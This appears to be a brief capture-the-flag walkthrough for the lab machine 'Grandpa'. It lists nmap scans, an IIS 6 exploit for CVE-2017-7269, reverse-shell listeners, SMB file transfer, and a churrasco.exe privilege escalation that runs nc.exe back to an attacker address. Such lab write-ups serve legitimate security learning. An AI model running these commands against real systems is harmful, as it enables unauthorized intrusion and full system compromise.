Ping
ping 10.10.10.14
Nmap Default Scan
nmap 10.10.10.14 -oN dnmap
Nmap Script and Service Scan
nmap 10.10.10.14 -sC -sV -A -oN snmap
We can see the path now…!
All port Scan
nmap 10.10.10.14 -p- --open -T5 -oN anmap
On Port 80
Will search for public exploit
Found one https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell
Will run the exploit
python2 exp.py 10.10.10.14 80 10.10.14.2 443
Got Reverse shell
rlwrap nc -nvlp 443
Will jump to Privilege Escalation…!
Wii get System info
Got the vulnerable one..!
Get the binary from the link https://github.com/Re4son/Churrasco/raw/master/churrasco.exe And Shared it to the target machine via smb
impacket-smbserver kali .
copy \\10.10.14.2\kali\churrasco.exe
Now will run the binary
It Worked..!
Will get the reverse shell using nc.exe, First will transfer nc.exe to target machine
copy \\10.10.14.2\kali\nc.exe
Now will get the reverse shell
churrasco.exe "nc.exe -e cmd.exe 10.10.14.2 443"
rlwrap nc -nvlp 443
Got it…!
Will get the flags
dir /s /b "C:\Documents and Settings\*.txt"
Got the locations.
User.txt
Root.txt
Done with Grandpa…:)